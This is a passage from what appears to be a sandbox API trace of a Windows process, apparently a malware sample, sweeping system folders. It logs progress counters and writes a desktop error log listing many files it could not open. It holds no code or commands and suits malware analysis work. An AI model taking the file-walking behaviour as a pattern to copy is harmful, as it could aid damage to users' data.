specified\r\nOPER_BTO: Cannot open file \"C:\\Users\\All Users\\Microsoft\\Diagnosis\\DownloadedScenarios\\WINDOWS.SIUF.xml.new\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Users\\All Users\\Oracle\\Java\\javapath_target_5923062\\java.exe\". The system cannot find the file specified\r\nOPER_BTO: Cannot open file \"C:\\Users\\All Users\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\vcredist_x64.exe\". The system cannot find the file specified\r\nOPER_BTO: Cannot open file \"C:\\Users\\All Users\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\vc_runtimeMinimum_x64.msi\". The system cannot find the file specified\r\nOPER_BTO: Cannot open file \"C:\\Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\vc_runtimeMinimum_x64.msi\". The system cannot find the file specified\r\nOPER_ATO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Seyes.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\en-US\\Journal", lpUsedDefaultChar=0x0) returned 16749 [0289.646] WriteFile (in: hFile=0x2d4, lpBuffer=0x1ed0b48*, nNumberOfBytesToWrite=0x416d, lpNumberOfBytesWritten=0x63fe20, lpOverlapped=0x0 | out: lpBuffer=0x1ed0b48*, lpNumberOfBytesWritten=0x63fe20*=0x416d, lpOverlapped=0x0) returned 1 [0289.647] CloseHandle (hObject=0x2d4) returned 1 [0289.647] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r[LPROGRESS][10]: G=1107 / B=46 / T=2891", cchWideChar=40, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 40 [0289.647] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r[LPROGRESS][10]: G=1107 / B=46 / T=2891", cchWideChar=40, lpMultiByteStr=0x1ff3c1c, cbMultiByte=40, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r[LPROGRESS][10]: G=1107 / B=46 / T=2891", lpUsedDefaultChar=0x0) returned 40 [0289.647] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x63feb4, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x63feb4*=0x28, lpOverlapped=0x0) returned 1 [0289.674] Sleep (dwMilliseconds=0x5dc) [0291.183] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r[LPROGRESS][10]: G=1174 / B=46 / T=2891", cchWideChar=40, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 40 [0291.183] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r[LPROGRESS][10]: G=1174 / B=46 / T=2891", cchWideChar=40, lpMultiByteStr=0x1ff3c1c, cbMultiByte=40, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r[LPROGRESS][10]: G=1174 / B=46 / T=2891", lpUsedDefaultChar=0x0) returned 40 [0291.184] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x63feb4, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x63feb4*=0x28, lpOverlapped=0x0) returned 1 [0291.186] Sleep (dwMilliseconds=0x5dc) [0292.744] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\elog_460F9943EA70F103.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\elog_460f9943ea70f103.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2f4 [0292.758] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="OPER_BTO: Cannot open file \"C:\\Program Files\\Microsoft Office 15\\alfred.exe\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\en-US\\jnwdui.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Genko_1.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\Workflow.Targets\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Journal.exe\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Seyes.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Mail\\en-US\\WinMail.exe.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Portable Devices\\restaurant.exe\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\MSBuild\\expenditurevincenttablet.exe\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\en-US\\MSPVWCTL.DLL.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Memo.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Mail\\wabmig.exe\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Photo Viewer\\en-US\\ImagingDevices.exe.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\en-US\\NBMapTIP.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Month_Calendar.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Mail\\WinMail.exe\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\en-US\\JNTFiltr.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Dotted_Line.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Mail\\en-US\\msoeres.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\Workflow.VisualBasic.Targets\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\PDIALOG.exe\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Shorthand.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\en-US\\PDIALOG.exe.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Music.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Multimedia Platform\\tones engaging.exe\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Photo Viewer\\ImagingDevices.exe\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Photo Viewer\\en-US\\PhotoAcq.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\en-US\\jnwmon.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Genko_2.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Mail\\th-italia.exe\". The process cannot access the file because it is being used by another process\r\nOPER_ATO: Cannot open file \"C:\\Program Files\\Microsoft Office 15\\alfred.exe\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Java\\jre1.8.0_131\\bin\\server\\classes.jsa\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Uninstall Information\\italian.exe\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\blank.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\To_Do_List.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Photo Viewer\\en-US\\PhotoViewer.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files (x86)\\Google\\november.exe\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Program Files (x86)\\Google\\syria promptly.exe\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Program Files (x86)\\Windows Mail\\wabmig.exe\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files (x86)\\Windows Mail\\en-US\\msoeres.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files (x86)\\Windows Photo Viewer\\en-US\\PhotoViewer.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files (x86)\\Windows Photo Viewer\\en-US\\PhotoAcq.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files (x86)\\Windows Mail\\en-US\\WinMail.exe.mui\". Access is denied\r\nOPER_ATO: Cannot open file \"C:\\Program Files\\Windows Journal\\en-US\\jnwdui.dll.mui\". A", cchWideChar=17253, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17253 [0292.758] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="OPER_BTO: Cannot open file \"C:\\Program Files\\Microsoft Office 15\\alfred.exe\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\en-US\\jnwdui.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Genko_1.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\Workflow.Targets\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Journal.exe\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Seyes.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Mail\\en-US\\WinMail.exe.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Portable Devices\\restaurant.exe\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\MSBuild\\expenditurevincenttablet.exe\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\en-US\\MSPVWCTL.DLL.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Memo.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Mail\\wabmig.exe\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Photo Viewer\\en-US\\ImagingDevices.exe.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\en-US\\NBMapTIP.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Month_Calendar.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Mail\\WinMail.exe\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\en-US\\JNTFiltr.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Dotted_Line.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Mail\\en-US\\msoeres.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\Workflow.VisualBasic.Targets\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\PDIALOG.exe\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Shorthand.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\en-US\\PDIALOG.exe.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Music.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Multimedia Platform\\tones engaging.exe\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Photo Viewer\\ImagingDevices.exe\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Photo Viewer\\en-US\\PhotoAcq.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\en-US\\jnwmon.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Genko_2.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Mail\\th-italia.exe\". The process cannot access the file because it is being used by another process\r\nOPER_ATO: Cannot open file \"C:\\Program Files\\Microsoft Office 15\\alfred.exe\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Java\\jre1.8.0_131\\bin\\server\\classes.jsa\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Uninstall Information\\italian.exe\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\blank.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\To_Do_List.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Photo Viewer\\en-US\\PhotoViewer.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files (x86)\\Google\\november.exe\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Program Files (x86)\\Google\\syria promptly.exe\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Program Files (x86)\\Windows Mail\\wabmig.exe\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files (x86)\\Windows Mail\\en-US\\msoeres.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files (x86)\\Windows Photo Viewer\\en-US\\PhotoViewer.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files (x86)\\Windows Photo Viewer\\en-US\\PhotoAcq.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files (x86)\\Windows Mail\\en-US\\WinMail.exe.mui\". Access is denied\r\nOPER_ATO: Cannot open file \"C:\\Program Files\\Windows Journal\\en-US\\jnwdui.dll.mui\". A", cchWideChar=17253, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17253 [0292.758] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="OPER_BTO: Cannot open file \"C:\\Program Files\\Microsoft Office 15\\alfred.exe\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\en-US\\jnwdui.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Genko_1.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\Workflow.Targets\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Journal.exe\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Seyes.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Mail\\en-US\\WinMail.exe.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Portable Devices\\restaurant.exe\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\MSBuild\\expenditurevincenttablet.exe\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\en-US\\MSPVWCTL.DLL.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Memo.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Mail\\wabmig.exe\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Photo Viewer\\en-US\\ImagingDevices.exe.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\en-US\\NBMapTIP.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Month_Calendar.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Mail\\WinMail.exe\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\en-US\\JNTFiltr.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Dotted_Line.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Mail\\en-US\\msoeres.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\Workflow.VisualBasic.Targets\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\PDIALOG.exe\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Shorthand.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\en-US\\PDIALOG.exe.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Music.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Multimedia Platform\\tones engaging.exe\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Photo Viewer\\ImagingDevices.exe\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Photo Viewer\\en-US\\PhotoAcq.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\en-US\\jnwmon.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Genko_2.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Mail\\th-italia.exe\". The process cannot access the file because it is being used by another process\r\nOPER_ATO: Cannot open file \"C:\\Program Files\\Microsoft Office 15\\alfred.exe\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Java\\jre1.8.0_131\\bin\\server\\classes.jsa\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Uninstall Information\\italian.exe\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\blank.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\To_Do_List.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Photo Viewer\\en-US\\PhotoViewer.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files (x86)\\Google\\november.exe\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Program Files (x86)\\Google\\syria promptly.exe\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Program Files (x86)\\Windows Mail\\wabmig.exe\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files (x86)\\Windows Mail\\en-US\\msoeres.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files (x86)\\Windows Photo Viewer\\en-US\\PhotoViewer.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files (x86)\\Windows Photo Viewer\\en-US\\PhotoAcq.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files (x86)\\Windows Mail\\en-US\\WinMail.exe.mui\". Access is denied\r\nOPER_ATO: Cannot open file \"C:\\Program Files\\Windows Journal\\en-US\\jnwdui.dll.mui\". A", cchWideChar=17253, lpMultiByteStr=0x1ed2b78, cbMultiByte=17253, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OPER_BTO: Cannot open file \"C:\\Program Files\\Microsoft Office 15\\alfred.exe\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\en-US\\jnwdui.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Genko_1.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\Workflow.Targets\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Journal.exe\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Seyes.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Mail\\en-US\\WinMail.exe.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Portable Devices\\restaurant.exe\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\MSBuild\\expenditurevincenttablet.exe\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\en-US\\MSPVWCTL.DLL.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Memo.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Mail\\wabmig.exe\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Photo Viewer\\en-US\\ImagingDevices.exe.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\en-US\\NBMapTIP.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Month_Calendar.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Mail\\WinMail.exe\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\en-US\\JNTFiltr.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Dotted_Line.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Mail\\en-US\\msoeres.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\Workflow.VisualBasic.Targets\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\PDIALOG.exe\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Shorthand.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\en-US\\PDIALOG.exe.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Music.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Multimedia Platform\\tones engaging.exe\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Photo Viewer\\ImagingDevices.exe\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Photo Viewer\\en-US\\PhotoAcq.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\en-US\\jnwmon.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Genko_2.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Mail\\th-italia.exe\". The process cannot access the file because it is being used by another process\r\nOPER_ATO: Cannot open file \"C:\\Program Files\\Microsoft Office 15\\alfred.exe\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Java\\jre1.8.0_131\\bin\\server\\classes.jsa\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Uninstall Information\\italian.exe\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\blank.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\To_Do_List.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Photo Viewer\\en-US\\PhotoViewer.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files (x86)\\Google\\november.exe\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Program Files (x86)\\Google\\syria promptly.exe\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Program Files (x86)\\Windows Mail\\wabmig.exe\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files (x86)\\Windows Mail\\en-US\\msoeres.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files (x86)\\Windows Photo Viewer\\en-US\\PhotoViewer.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files (x86)\\Windows Photo Viewer\\en-US\\PhotoAcq.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files (x86)\\Windows Mail\\en-US\\WinMail.exe.mui\". Access is denied\r\nOPER_ATO: Cannot open file \"C:\\Program Files\\Windows Journal\\en-US\\jnwdui.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files (x86)\\Windows Photo Viewer\\en-US\\ImagingDevices.exe.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files (x86)\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\Workflow.Targets\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files (x86)\\Windows Photo Viewer\\ImagingDevices.exe\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files (x86)\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\Workflow.VisualBasic.Targets\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files (x86)\\Windows Portable Devices\\regulations_consensus_score.exe\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Program Files (x86)\\Windows Mail\\WinMail.exe\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\device.png\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Users\\All Users\\Microsoft\\Diagnosis\\DownloadedScenarios\\WINDOWS.UIF.xml.new\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Users\\All Users\\Microsoft\\Network\\Downloader\\qmgr0.dat\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Users\\All Users\\Microsoft\\Diagnosis\\DownloadedScenarios\\WINDOWS.DIAGNOSTICS.xml.new\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\overlay.png\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Users\\All Users\\Microsoft\\Diagnosis\\DownloadedSettings\\cfc.flights.json\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Users\\All Users\\Microsoft\\Network\\Downloader\\qmgr1.dat\". The process cannot access the file because it is being used by another process\r\nOPER_ATO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Genko_1.jtp\". Access is denied\r\nOPER_ATO: Cannot open file \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\Workflow.Targets\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\ProgramData\\regid.1991-06.com.microsoft\\regid.1991-06.com.microsoft_Windows-10-Pro.swidtag\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Users\\All Users\\regid.1991-06.com.microsoft\\regid.1991-06.com.microsoft_Windows-10-Pro.swidtag\". Access is denied\r\nOPER_ATO: Cannot open file \"C:\\Program Files\\Windows Journal\\Journal.exe\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Users\\All Users\\Microsoft\\Device 